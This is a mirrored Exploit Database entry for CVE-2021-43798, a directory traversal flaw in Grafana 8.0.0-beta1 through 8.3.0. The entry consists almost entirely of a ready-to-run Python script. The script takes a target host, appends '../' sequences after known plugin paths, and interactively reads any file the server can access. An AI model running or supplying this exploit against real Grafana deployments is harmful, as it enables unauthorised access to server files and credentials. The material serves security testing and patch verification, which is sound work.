Grafana 8.3.0 – Directory Traversal and Arbitrary File Read

• Exploit Database
• 112 阅读

• 作者： s1gh
  日期： 2021-12-09
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50581/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105

  # Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read # Date: 08/12/2021 # Exploit Author: s1gh # Vendor Homepage: https://grafana.com/ # Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p # Version: V8.0.0-beta1 through V8.3.0 # Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files. # CVE: CVE-2021-43798 # Tested on: Debian 10 # References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p   #!/usr/bin/env python3 # -*- coding: utf-8 -*-   import requests import argparse import sys from random import choice   plugin_list = [ "alertlist", "annolist", "barchart", "bargauge", "candlestick", "cloudwatch", "dashlist", "elasticsearch", "gauge", "geomap", "gettingstarted", "grafana-azure-monitor-datasource", "graph", "heatmap", "histogram", "influxdb", "jaeger", "logs", "loki", "mssql", "mysql", "news", "nodeGraph", "opentsdb", "piechart", "pluginlist", "postgres", "prometheus", "stackdriver", "stat", "state-timeline", "status-histor", "table", "table-old", "tempo", "testdata", "text", "timeseries", "welcome", "zipkin" ]   def exploit(args): s = requests.Session() headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' }   while True: file_to_read = input('Read file > ')   try: url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read req = requests.Request(method='GET', url=url, headers=headers) prep = req.prepare() prep.url = url r = s.send(prep, verify=False, timeout=3)   if 'Plugin file not found' in r.text: print('[-] File not found\n') else: if r.status_code == 200: print(r.text) else: print('[-] Something went wrong.') return except requests.exceptions.ConnectTimeout: print('[-] Request timed out. Please check your host settings.\n') return except Exception: pass   def main(): parser = argparse.ArgumentParser(description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read") parser.add_argument('-H',dest='host',required=True, help="Target host") args = parser.parse_args()   try: exploit(args) except KeyboardInterrupt: return     if __name__ == '__main__': main() sys.exit(0)